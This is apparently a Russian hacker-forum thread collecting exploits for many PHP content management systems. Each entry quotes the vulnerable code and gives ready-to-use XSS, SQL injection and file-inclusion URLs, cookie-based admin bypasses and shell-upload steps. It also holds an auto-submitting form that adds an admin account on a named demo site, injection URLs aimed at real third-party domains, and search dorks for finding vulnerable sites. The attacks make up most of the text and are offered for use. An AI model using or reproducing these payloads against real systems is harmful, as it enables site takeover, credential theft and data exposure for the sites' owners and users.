v 1.5>

XSS

index.php?fid=XSS&id=

(с) Twin $park

cms pragmaMx 0.1.11
http://www.pragmamx.org/Downloads-op-view-lid-731.html

dork: "This Website based on pragmaMx"

Passive XSS
уязвимы параметры newlang, name, op, query, show_all,orderby, min, cid, id
http://localhost/html/index.php?newlang=1>"><script>alert(121212);</script>
http://localhost/html/index.php?newlang=1>"><script>alert(121212)%3B</script>
http://localhost/html/modules.php?name=1>"><script>alert(121212)%3B</script>
http://localhost/html/modules.php?name=nnn&newlang=1>"><script>alert(121212)%3B</script>
http://localhost/html/modules.php?name=nnn&op=NewLinks&query=1>"><script>alert(121221)%3B</script>&min=0&orderby=dateD
http://localhost/html/modules.php?name=nnn&show_all=1>"><script>alert(121212)%3B</script>
http://localhost/html/modules.php?name=nnn&op=AddEntry&query=111&min=0&orderby=1%22'%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E
http://localhost/html/modules.php?name=nnnt&min=1%3E%22%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E&orderby=dateD&cid=0
http://localhost/html/modules.php?name=nnn&rop=showcontent&id=1%3E%22%3E%3Cscript%3Ealert(121212)%3B%3C/script%3E

SQL
права админа

admin/modules/banners.php
function bannerdelete($bid, $ok = 0)
{
global $prefix, $bgcolor2, $bgcolor3, $script;
if (!empty($ok)) {
if ($ok == 1) {
}
sql_query("delete from " . $prefix . "_banner where bid='$bid'");
header("Location: admin.php?op=banneradmin#top");
} else {
include("header.php");
GraphicAdmin();
OpenTable();
echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />";
echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>";
CloseTable();
echo '<br />';
$result = sql_query("select bid,imptotal,impmade,clicks,imageurl,clickurl,altt ext,script,active,typ from " . $prefix . "_banner where bid=$bid");
list($bid, $imptotal, $impmade, $clicks, $imageurl, $clickurl, $alttext, $script, $active, $typ) = sql_fetch_row($result);http://localhost/html/admin.php?op=bannerdelete&bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10+--+&ok=0




function banneredit($bid)
{
global $prefix;
include("header.php");
GraphicAdmin();
OpenTable();
echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />";
echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>";
CloseTable();
echo '<br />';
$result = sql_query("select cid, imptotal, impmade, clicks, imageurl, clickurl, alttext, script, typ, active from " . $prefix . "_banner where bid=$bid");http://localhost/html/admin.php?op=banneredit&bid=-1+union+select+1,2,3,4,version(),6,7,8,9,10+--+&ok=0



function bannerclientdelete($cid, $ok = 0)
{
global $prefix, $bid, $cid, $impmade, $clicks, $imageurl, $alttext, $bdate, $typ, $script;
if (!empty($ok)) {
if ($ok == 1) {
sql_query("delete from " . $prefix . "_banner where cid='$cid'");
sql_query("delete from " . $prefix . "_bannerclient where cid='$cid'");
}
header("Location: admin.php?op=banneradmin#top");
} else {
include("header.php");
GraphicAdmin();
OpenTable();
echo "<center><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />";
echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></center>";
CloseTable();
echo '<br />';
OpenTableAl();
$result2 = sql_query("select bid,cid,impmade,clicks,imageurl,clickurl,alttext,d atestart,typ,script from " . $prefix . "_banner where cid=$cid");http://localhost/html/admin.php?op=bannerclientdelete&cid=-1+union+select+1,2,3,4,5,6,7,8,9,version()+--+



function bannerclientedit($cid)
{
global $prefix;
include("header.php");
GraphicAdmin();
OpenTable();
echo "<div align=\"center\"><font class=\"title\"><b>" . _BANNERSADMIN . "</b></font><br /><br />";
echo "<a href=\"admin.php?op=banneradmin\">" . _BACKTO . " " . _ADMINMENU . "</a></div>";
CloseTable();
echo '<br />';
$result = sql_query("select name, contact, email, login, passwd, extrainfo from " . $prefix . "_bannerclient where cid=$cid");
list($name, $contact, $email, $login, $passwd, $extrainfo) = sql_fetch_row($result);http://localhost/html/admin.php?op=bannerclientedit&cid=-1+union+select+1,version(),3,4,5,6+--+


==================


Обновилась версия CMS до
PragmaMX 0.1.12

В ней добавлен новый модуль - osc2pragmaMX, это уже известная osCommerce Online Merchant v2.2 RC2a.
Соответсвенно появилаь уязвимость:

catalog/admin/includes/application_top.php
...
// redirect to login page if administrator is not yet logged in
if (!tep_session_is_registered('admin')) {
if (isset($_COOKIE['admin'])){
$bridge_admin = $_COOKIE['admin'];
$bridge_admin_login = false;
if (!is_array($bridge_admin)) {
$bridge_admin = base64_decode($bridge_admin);
$bridge_admin = addslashes($bridge_admin);
$bridge_admin = explode(":", $bridge_admin);
}
$bridge_adminid = $bridge_admin[0];
$bridge_adminpwd = $bridge_admin[1];
$bridge_adminid = substr(addslashes($bridge_adminid), 0, 25);
if (!empty($bridge_adminid) && !empty($bridge_adminpwd)) {
$sql = "SELECT pwd FROM ".$prefix."_authors WHERE aid='$bridge_adminid'";
$result = tep_db_query($sql);
$pass = tep_db_fetch_array($result);

if ($pass['pwd'] == $bridge_adminpwd && !empty($pass['pwd'])){
tep_session_register('admin');
}
}
}else{
$redirect = false;

$current_page = basename($PHP_SELF);

if ($current_page != FILENAME_LOGIN) {
if (!tep_session_is_registered('redirect_origin')) {
tep_session_register('redirect_origin');

$redirect_origin = array('page' => $current_page,
'get' => $HTTP_GET_VARS);
}

$redirect = true;
}

if ($redirect == true) {
tep_redirect(tep_href_link(FILENAME_LOGIN));
}

unset($redirect);
}
уязвимость находится в строках
$current_page = basename($PHP_SELF);

if ($current_page != FILENAME_LOGIN) {
С точки зрения обычного (если он не посещает antichat.ru) программиста это безупречная проверка, но конструкция
admin/any_file.php/login.php проходит эту проверку, а на выполнение подается any_file.php.

Заливка шелла

запускаем файловый менеджер
http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php

не забываем добавлять к УРЛу login.php

новый файл
http://demo.osc2pragmamx.org/modules/catalog/admin/file_manager.php/login.php?action=new_file


Добавляем себя в админы.

AddAdm.html
<form method="post" action="http://demo.osc2pragmamx.org/modules/catalog/admin/administrators.php/login.php?action=insert">
<input type=hidden name="username" value="as" />
<input type=hidden name="password" value="123123" />
<input type=hidden name="x" value="16" />
<input type=hidden name="y" value="13" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>

Уязвимость работает, даже если модуль не подключен, поскольку для запуска используем не CMS,
а путь до скрипта http:/site.com/path_cms/modules/catalog/admin/any_file.php

Дабы не копировать по 5 раз. Лучше дам просто ссылку на пост, надеюсь так можно. Там 1 движок News Edit, а второй что-то похожее на движек, просто компания делает сайты все как один, потому это тоже можно назвать движком :)
http://forum.antichat.ru/threadedpost1839460.html#post1839460

cms awcm v2_1 final
http://sourceforge.net/projects/awcm/

header.php
if(isset($_GET['id'])) {
$gid = $_GET['id'];
if(!is_numeric($gid) OR $gid == "") { exit; }
}
if(isset($_GET['pm'])) {
$gpm = $_GET['pm'];
if(eregi("'",$gpm) OR eregi("SELECT",$gpm) OR eregi("union",$gpm) OR eregi("delete",$gpm) OR eregi("table",$gpm) OR eregi("member",$gpm) OR eregi("update",$gpm) OR eregi('admin',$gpm) OR $gpm == "") { exit; }
}
if(isset($_GET['search'])) {
$gsearch = $_GET['search'];
if(eregi("'",$gsearch)) { exit; }
}

....

if(isset($_COOKIE['awcm_theme'])) {
$theme_file = $_COOKIE['awcm_theme'];
} else {
$theme_file = $mysql_maininfo_row['defult_theme'];
}

if(isset($_COOKIE['awcm_lang'])) {
$lang_file = $_COOKIE['awcm_lang'];
} else {
$lang_file = $mysql_maininfo_row['defult_language'];
}
@include ("themes/$theme_file/settings.php");
include ("common.php");

@include ("languages/$lang_file");

$member_cok = $_COOKIE['awcm_member']-197;
if(isset($_SESSION['awcm_member'])) {
$member = $_SESSION['awcm_member'];
} elseif (isset($_COOKIE['awcm_member'])) {
$mysql_checkdookie51_member_query = mysql_query("SELECT password,id FROM awcm_members WHERE id = '$member_cok'");
$mysql_checkdookie51_member_row = mysql_fetch_array($mysql_checkdookie51_member_quer y);
$mysql_checkdookie51_member_total = mysql_num_rows($mysql_checkdookie51_member_query);
if ($mysql_checkdookie51_member_total > 0) {
$member = $mysql_checkdookie51_member_row['id'];
$_SESSION['awcm_member'] = $mysql_checkdookie51_member_row['id'];
}
} else {
$member = 'no';
}
LFI
mq=off
http://localhost/awcm/header.php
cookies
awcm_theme=../../../../../../../../etc/passwd%00

LFI
http://localhost/awcm/header.php
cookies
awcm_lang=../../../../../../../../etc/passwd

Заходим админом
http://localhost/awcm/index.php
cookies
awcm_member=198

-----------------------
include/avatar.php
include ("../connect.php");
$gh = $_GET['h'];
$gw = $_GET['w'];
$gid = $_GET['id'];
$mysql_query = mysql_query("SELECT id,avatar FROM awcm_members WHERE id = '$gid'");
$mysql_total = mysql_num_rows($mysql_query);
$mysql_row = mysql_fetch_array($mysql_query);

if($mysql_total == 1) {
if($mysql_row['avatar'] == "") {
print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />';
} else {
print '<img src="'.$mysql_row['avatar'].'" height="'.$gh.'" width="'.$gw.'" />';
}
} else {
print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />';
}

Passive XSS
mq=off
http://localhost/awcm/includes/avatar.php?h=1>"><SCRiPt>alert(1212);</SCRiPt>
http://localhost/awcm/includes/avatar.php?w=1>"><SCRiPt>alert(1212);</SCRiPt>

SQL
mq=off
http://localhost/awcm/includes/avatar.php?id=1'+and+1=2+union+select+1,version()+--+

-----------------------
includes/show_vid_title.php
include ("../connect.php");
$gid = $_GET['id'];
$mysql_show_vid_title_php_query = mysql_query("SELECT id,title FROM awcm_videos_videos WHERE id = '$gid'");
$mysql_show_vid_title_php_row = mysql_fetch_array($mysql_show_vid_title_php_query) ;

print $mysql_show_vid_title_php_row['title'];
SQL
mq=off
http://localhost/awcm/includes/show_vid_title.php?id=-1'+union+select+1,version()+--+

===============
RulleR
а через параметры 'pm' и 'search' нельзя провести инъекцию? вижу функцию eregi(), а она воспринимает null byte за конец строки...

можно
member_cp_pm.php
include ("header.php");
...
if(isset($_GET['pm'])) {
$mysql_mmbrcppmviewpmpg_query = mysql_query("SELECT * FROM awcm_member_pms WHERE hash = '$_GET[pm]' AND reciever = '$member' OR hash = '$_GET[pm]' AND sender = '$member'");
SQL
mq=off
http://localhost/awcm/member_cp_pm.php?pm=%00'+union+select+1,2,3,versio n(),5,6,7;+--+

SmartyCMS
http://sunet.dl.sourceforge.net/project/smartycms/smartycms/0.9.4 build 334/smartycms-0.9.4-334.zip

Passive XSS
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&cmsUserRole=1>'><script>alert(121212);</script>

----------------

js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php
$l = (isset($_REQUEST['lang']) ? new PLUG_Lang($_REQUEST['lang']) : new PLUG_Lang($cfg['lang']));
$l->setBlock('ibrowser');

js/tiny_mce/plugins/ibrowser/langs/lang.class.php
function setBlock( $value ) {
$this -> block = $value;

function getLang() {
$this -> lang = $value;

function loadData() {
global $cfg;
include( dirname(__FILE__) . '/' . $this -> lang.'.php' );

LFI
mq=off
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=../../../../../../../../../../boot.ini%00
аналогично
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=../../../../../../../../../../boot.ini%00
http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=../../../../../../../../../../boot.ini%00

----------------

config/smartycms.config.php
// url request param name for template call
$smartycms['config']['PageCallParamName'] = 'page';
libraries/smarty-cms/Smarty_cms.php
// read default template name from given url param
if (!$resource_name && !empty($smartycms['config']['PageCallParamName']))
if ( !empty($_REQUEST[$smartycms['config']['PageCallParamName']]) )
{
$page = $_REQUEST[$smartycms['config']['PageCallParamName']];
$ext = strrchr($page, '.');

if($ext !== false) $resource_name = substr($page, 0, -strlen($ext)); else $resource_name = $page;

$resource_name .= '.'.$smartycms['config']['TemplateFileExtension'];
}


libraries/smarty/Smarty.class.php
if ($display && !$this->caching && count($this->_plugins['outputfilter']) == 0) {
if ($this->_is_compiled($resource_name, $_smarty_compile_path)
|| $this->_compile_resource($resource_name, $_smarty_compile_path))
{
include($_smarty_compile_path);
}
LFI
mq=off
http://localhost/smartycms-0.9.4-334/index.php?page=/boot.ini%00.html

----------------
templates/handler/book_content_handler.php
function book_content_handler($params, &$smarty)
{
global $smartycms;
// create individual chapter id
if (!$_GET['chapterid'] || $_GET['chapterid']=="1") $chapterid=time(); else $chapterid=$_GET['chapterid'];

// send content to template
$smarty->assign("chapterid",$chapterid);
$smarty->assign("book_chapter_id","book_chapter_".$chapterid);
$smarty->assign("book_content_id","book_content_".$chapterid);
}

templates/tutorial.tpl
{* Tutorial content block *}
{include file="modules/book_content.tpl" pid="smartycms_tutorial"}<br>

templates/modules/book_content.tpl
{if $smarty.request.chapterid}
<a name="start"></a>
<div class="cms_book_headline">{cms id="$book_chapter_id" theme="singleline" pid=$pid title="edit chapter headline"}Please insert here the chapter headline{/cms}</div><br>
{cms id="$book_content_id" pid=$pid title="edit chapter content" height="250" smartytags="0"}<div class="cms_book_bodytext">Please insert here the chapter content</div>{/cms}<br><br>
{/if}
view source
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../../../../../../boot.ini
http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../index.php

cms sabros.us
http://sourceforge.net/projects/sabrosus/files/latest

pXSS
http://localhost/sabrosus/index.php?busqueda=1<ScRiPt >alert(1212);</ScRiPt>
http://localhost/sabrosus/index.php?tag=1>"><ScRiPt>alert(1212);</ScRiPt>

------------

atom.php
if (isset($_GET["tag"])) {
$navegador = strtolower( $_SERVER['HTTP_USER_AGENT'] );
if (stristr($navegador, "opera") || stristr($navegador, "msie")) {
$tagtag = utf8_decode($_GET["tag"]);
} else {
$tagtag = $_GET["tag"];
}
}

$sqlStr = "SELECT DISTINCT link.* FROM ".$prefix."sabrosus as link, ".$prefix."tags as tag, ".$prefix."linktags as rel WHERE";

if(isset($tagtag)){
$sqlStr .= " (tag.tag LIKE '$tagtag') AND ";
}

$sqlStr .= " (tag.id = rel.tag_id AND rel.link_id = link.id_enlace) AND link.privado = 0 ORDER BY link.fecha DESC";

if(isset($cuantos)){
if($cuantos!='todos' && is_numeric($cuantos)){
$sqlStr .= " LIMIT $cuantos";
}
if($cuantos!='todos' && !is_numeric($cuantos)){
$sqlStr .= " LIMIT 10";
}
} else {
$sqlStr .= " LIMIT 10";
}
$result = mysql_query($sqlStr,$link);
SQL
mq=off
http://localhost/sabrosus/atom.php?tag=')+union+select+1,version(),3,4,5,6+--+
User-Agent=111

Croogo 1.2
(Геморная маленько)
Пассивная XSS
/admin/filemanager/browse?path=%22%3E%3Cscript%3Ealert();%3C/script%3E
Сработает на админе если он авторизированный.

ps
Залить шелл легко (Права админа нужны)
/admin/attachments
Там я думаю догадаетесь.

Imer - Site Manager 3.5.0
sourceforge.net/projects/ism-imersiteman/

path disclosure
http://localhost/imer/help/admin_common.php

--------------

divcliente.php
require_once './conecta.php';
require_once './suporte.php';
require_once './arrays.php';
if ($oplcat == '2'){
if ($ople == 'E'){
$pg_usuario = mysql_query("SELECT * FROM swb_usuarios WHERE ID = $idl LIMIT 1");
SQL
rg=on
http://localhost/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,version(),34,35,36,37,38,39,40,41,42,43+--+
http://www.trudelmer.com.br/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,version(),34,35,36,37,38,39,40,41,42,43+--+

--------------

noticia.php
$pg_noticias = mysql_query("SELECT * FROM swb_noticias WHERE status = 'A' AND ID = $idl LIMIT 1");SQL
rg=on
http://localhost/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
http://www.trudelmer.com.br/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--

--------------

divhelp.php
require_once './conecta.php';
require_once './suporte.php';
require_once './arrays.php';
if ($oplhlp == 'Y' || $oplhlp == 'N' || $oplhlp == 'R' || $oplhlp == 'L'){
if ($ople == 'E'){
$pg_userhelp = mysql_query("SELECT * FROM livehelp_users WHERE username = '$login' LIMIT 1");
SQL
rg=on
mq=off
http://localhost/imer/divhelp.php?oplhlp=Y&ople=E&&login=hhhh'+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,version(),31,32,33,34,35,36,37,38,39,40+limit+1 +--+

PHP - STATS
текущая версия 0.1.9.2
сайт: php-stats.com
фаил : downloads.php
условия magic_quotes_gpc = off
уязвимый код :


$result=sql_query("SELECT nome,descrizione,type,home,size,downloads,withinte rface FROM $option[prefix]_downloads WHERE id='$id'");
.................................................. .................................................. ..........
if(($mode!='download' && $downloads_withinterface=='YES') || $errorDownload===true)
{
..........................................
else {а вот собственно тут уже и имеем вывод на экран}
{



использование :
http://localhost/php-stats/download.php?mode=downloadd&id=999999'+union+select+1,2,2,3,4,5,"YES"+from+information_schema.tables%23

Пример для сайта производителей:
http://php-stats.com/stat/download.php?mode=downloadd&id=999999'+union+select+1,version(),2,3,4,5,"YES"%23

P.S 6й столбец должен быть обезательно задан как "YES" иначе не будет вывода

GAzie - Gestione Aziendale v4.0.13
http://sourceforge.net/projects/gazie/

Finance application written in PHP using a MySql database backend for small to medium enterprise.
It lets you write invoices, manage stock, manage orders , accounting, etc.
Send tax receipt to electronic cash register.

pXSS
http://localhost/gazie/modules/root/login_admin.php
post
Login=1>'><script>alert(1212)</script>
Password=111111
actionflag=Login

----------------

modules/root/login_admin.php
if (isset ($_POST['actionflag'])) {
// checkUser();
$result = gaz_dbi_get_row ($gTables['admin'], "Login", $_POST['Login']);
if (!empty ($result['lang'])){
$lang = $result['lang'];
} else {
$lang = 'italian';
}
require("./lang.".$lang.".php");

library/include/mysql.lib.php
function gaz_dbi_get_row( $table, $fnm, $fval)
{
global $link;
$result = mysql_query("SELECT * FROM $table WHERE $fnm = '$fval'", $link);
if (!$result) die (" Error gaz_dbi_get_row: ".mysql_error());
return mysql_fetch_array( $result);
}

SQL+LFI
mq=off
http://localhost/gazie/modules/root/login_admin.php
post
Login=111'+union+select+1,2,3,"../../../../../../../../../../boot.ini%00",5,6,7,8,9,10,11,12,13+--+
Password=111111
actionflag=Login

Andy's PHP Knowledgebase v0.94.2
http://aphpkb.org/


forgot_password.php
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/forgot_password.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>

-------------------------------------------------------------

keysearch.php
if($_REQUEST['keyword_list']){
$keyword_list = escdata($_REQUEST['keyword_list']);
} else {
$keyword_list = 'nothing';
}
...
// If it's not the first page, make a Previous button.
if ($current_page != 1) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start - $display) . '&np=' . $num_pages . '">Previous</a> ';
}

// Make all the numbered pages.
for ($i = 1; $i <= $num_pages; $i++) {
if ($i != $current_page) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . (($display * ($i - 1))) . '&np=' . $num_pages . '">' . $i . '</a> ';
} else {
echo $i . ' ';
}
}
// If it's not the last page, make a Next button.
if ($current_page != $num_pages) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start + $display) . '&np=' . $num_pages . '">Next</a>';
}
pXSS
http://localhost/aphpkb/keysearch.php
post keyword_list=1<script>alert(121212)</script>

-------------------------------------------------------------

login.php
<p>User Name:<br /><input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/login.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>

-------------------------------------------------------------

q.php
$articledatae = escdata(xss_clean($_POST['article']) );
...

$articledata = stripslashes($articledatae);

echo '<p>Article Details</p>';

echo "<p>Question:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/q.php
post article=1<div+style+STYLE="width:expression(alert(121212))%3B">&aid=111&submit=Submit%20Question

-------------------------------------------------------------

register.php
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>First Name:<br /> <input type="text" name="first_name" size="15" maxlength="15" value="<?php if (isset($_POST['first_name'])) echo $_POST['first_name']; ?>" /></p>
<p>Last Name:<br /> <input type="text" name="last_name" size="30" maxlength="30" value="<?php if (isset($_POST['last_name'])) echo $_POST['last_name']; ?>" /></p>
<p>Email Address:<br /> <input type="text" name="email" size="40" maxlength="40" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" /> </p>
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /> <small>Use only letters, numbers, and the underscore. Must be between 4 and 20 characters long.</small></p>
pXSS
http://localhost/aphpkb/register.php
post first_name=1>"><script%20%0a%0d>alert(121212)%3B</script
post last_name=1>"><script%20%0a%0d>alert(121212)%3B</script>
post email=1>"><script%20%0a%0d>alert(121212)%3B</script>
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>

-------------------------------------------------------------

saa.php
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);

echo '<p>Article Details</p>';
if($titlee) { echo "<p>Title: $titlee</p>"; }
echo "<p>Article:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/saa.php
post article=1<div+style="width:expression(alert(121212))%3B">

Angora Guestbook v1.2.1
http://sourceforge.net/projects/aguestbook/

index.php
// Language settings
$langName = secureVar($_GET['l'], 'html');

if (! empty($langName))
$_SESSION['langName'] = $langName;

if (empty($_SESSION['langName']))
$langName = $config['guestbookLang'];
else
$langName = $_SESSION['langName'];

@include_once "languages/" . $langName . "/frontend.php";

classes/functions.php
function secureVar($var, $type) {
global $con;
switch ($type) {
case 'sql' :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
break;
case 'html' :
$var = htmlspecialchars($var, ENT_QUOTES);
break;
default :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
}
return $var;
}
LFI
mq=off
http://localhost/angora_1_2_1/guestbook/index.php?l=../../../../../../../../boot.ini%00

------------------------

admin/includes/content/phpinfo.php
if (@$magic != "0xDEADBEEF")
die("This file cannot be executed directly");

if (base64_decode($_SESSION['privilege']) != 1) {
$error = new Error($lang['noPermission']);
die($error->showError());
}

ob_start();
phpinfo();

phpinfo
http://localhost/angora_1_2_1/guestbook/admin/includes/content/phpinfo.php?magic=0xDEADBEEF&_SESSION[privilege]=MQ==

Продукт: mycroCMS
Сайт: http://sourceforge.net/projects/mycrocms/
Path diclosing
http://localhost/mycrocms/?entry_id='
LFI

Участок кода в /admin/admin.php:

if ($admin=="error"){
include ("error.php");
}elseif ($userManager->isLoggedIn()) {
if ($admin == "") {
include ("dashboard.php");
} else {
if (file_exists("admin/$admin.php")) {
include ("admin/$admin.php");
} else {
die("File admin/$admin.php does not exist!");
}
}
$userManager->setLastTime(time());
} else {

if ($admin == "") {
include ("dashboard.php");
} else {
if (file_exists("admin/$admin.php")) {
include ("admin/$admin.php");

} else {
die("File admin/$admin.php does not exist!");
}
}
$userManager->setLastTime(time());



}

Отсюда инклуд. Эксплуатация:

http://localhost/mycrocms/?admin=../../../../../../etc/passwd%00

(права админа не нужны)

SQL-Injection

magiq_quotes=Off
Смотрим в \include\Categories.php:

function get_category_by_id($id) {
global $sql, $categories;

// use array if preloaded
if (is_array($categories)) {
$res = array_search_recursive('category_id', $id, $categories);

}

if (!is_array($res[0])) {

$res = $sql->read('categories', 'category_id', $id);
}
return $res[0];
}

Теперь ищем метод read в классе sql. Весь код кидать не буду, но фильтрации там нет.

$sql = "SELECT * FROM `$tablep` " . $where . $order . $limit;

$result = mysql_query($sql);

Пример эксплуатации:

http://localhost/mycrocms/?cat_id=1'+and+row(1,1)%3E(select+count(*),concat( version(),0x3a,floor(rand()*2))

+x+from+mysql.user+group+by+x+limit+1)+and+'a'='a


Code Execution

Заливка шелла в админке. Идём в меню Plugins, там есть стандартный плагин second для редактирования шаблонов (а на деле - любых

файлов). Активируем его, затем идём на http://localhost/mycrocms/?plugin=second&page=themes и редактируем любой файл.

Pyrophobia CMS
Product : http://sourceforge.net/projects/pyrophobia/
Version : Pyrophobia CMS 2.1.3.1

Active XSS
1. Forum -- заходим в форум -- отправляем сообщение с текстом ( "><script>alert("xss");</script> )
2. PM -- Send User a PM -- отправляем текст ( '"/><script>alert("xss");</script> )

SQL injection

MySQL Version : 5.0.45 ---
http://localhost/[version]/?act=downloads/browsecategory&cat=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

http://localhost/[version]/index.php?act=UCP&CODE=02&mssg=3'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

На данном движке их много :(

LFI
milw0rm (http://milw0rm.com/exploits/8095)

BrewBlogger v2.3.1
http://www.brewblogger.net/

patch disclosure
http://localhost/brewblogger/includes/plug-ins.inc.php

----------------------

index.php
//image dir / SQL information and connect to MySQL server
require_once ('Connections/config.php');

//choose SQL table and set up functions to user authentication and
//navbar configuration for login/logout links
require ('includes/authentication_nav.inc.php'); session_start();

includes\authentication_nav.inc.php
$query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername);
$user = mysql_query($query_user, $brewing) or die(mysql_error());
$row_user = mysql_fetch_assoc($user);
$totalRows_user = mysql_num_rows($user);

Blind SQL
mq=off
http://localhost/brewblogger/index.php?loginUsername='+UNION+SELECT+(select+*+f rom(select+*+from(select+name_const((version()),1) d)+as+t+join+(select+name_const((version()),1)e)b) a)+--+

-----------------------

includes/db_connect_log.inc.php
/* set pagination variables */
if ($view == "limited") $display = 25;
elseif ($view == "all") $display = 9999999;
$pg = (isset($_REQUEST['pg']) && ctype_digit($_REQUEST['pg'])) ? $_REQUEST['pg'] : 1;
$start = $display * $pg - $display;

if (($row_pref['mode'] == "1") || (($row_pref['mode'] == "2") && ($filter == "all"))) {
mysql_select_db($database_brewing, $brewing);
$query_result = "SELECT count(*) FROM brewing";
if ($style != "all") $query_result .= " WHERE brewStyle='$style' AND"; else $query_result .= " WHERE";
$query_result .= " NOT brewArchive='Y'";
$result = mysql_query($query_result, $brewing) or die(mysql_error());
$total = mysql_result($result, 0);

$query_log = "SELECT * FROM brewing";
if ($style != "all") $query_log .= " WHERE brewStyle='$style' AND"; else $query_log .= " WHERE";
$query_log .= " NOT brewArchive='Y'";
$query_log .= " ORDER BY $sort $dir LIMIT $start, $display";

$sort слешируется ранее,
includes/url_variables.inc.php
$sort = "brewDate";
if (isset($_GET['sort'])) {
$sort = (get_magic_quotes_gpc()) ? $_GET['sort'] : addslashes($_GET['sort']);
}
$display никак не фильтруется. Хочется получить limit union select но мешает order by, поэтому только

Blind SQL
http://localhost/brewblogger/index.php?page=brewBlogList&&sort=(select+*+from(select+*+from(select+name_cons t((version()),1)d)+as+t+join+(select+name_const((v ersion()),1)e)b)a)

----------------------

sections.entry.inc.php
$dbTable = "brewing";
if (isset($_GET['dbTable'])) {
$dbTable = (get_magic_quotes_gpc()) ? $_GET['dbTable'] : addslashes($_GET['dbTable']);
}

if ($action == "default") {
$style = "default";
if (isset($_GET['style'])) {
$style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']);
}
}
else
$style = $_POST['style'];
if (($action == "verify") || ($action == "print")) {
$name = $_POST['name'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$homePhone = $_POST['homePhone'];
$workPhone = $_POST['workPhone'];
$email = $_POST['email'];
$brewClub = $_POST['brewClub'];
$brewName = $_POST['brewName'];
$still = $_POST['still'];
$dry = $_POST['dry'];
$hydromel = $_POST['hydromel'];
$petillant = $_POST['petillant'];
$semi = $_POST['semi'];
$standard = $_POST['standard'];
$sweet = $_POST['sweet'];
$sparkling = $_POST['sparkling'];
$sack = $_POST['sack'];
$special = $_POST['special'];
$waterTreatment = $_POST['waterTreatment'];
$yeastLiquid = $_POST['yeastLiquid'];
$yeastDried = $_POST['yeastDried'];
$starter = $_POST['starter'];
$yeastNutrients = $_POST['yeastNutrients'];
$carbonation = $_POST['carbonation'];
$volumeC02 = $_POST['volumeC02'];
$primingSugar = $_POST['primingSugar'];
$bottlingDate = $_POST['bottlingDate'];
$finingsType = $_POST['finingsType'];
$finingsAmount = $_POST['finingsAmount'];
}

mysql_select_db($database_brewing, $brewing);
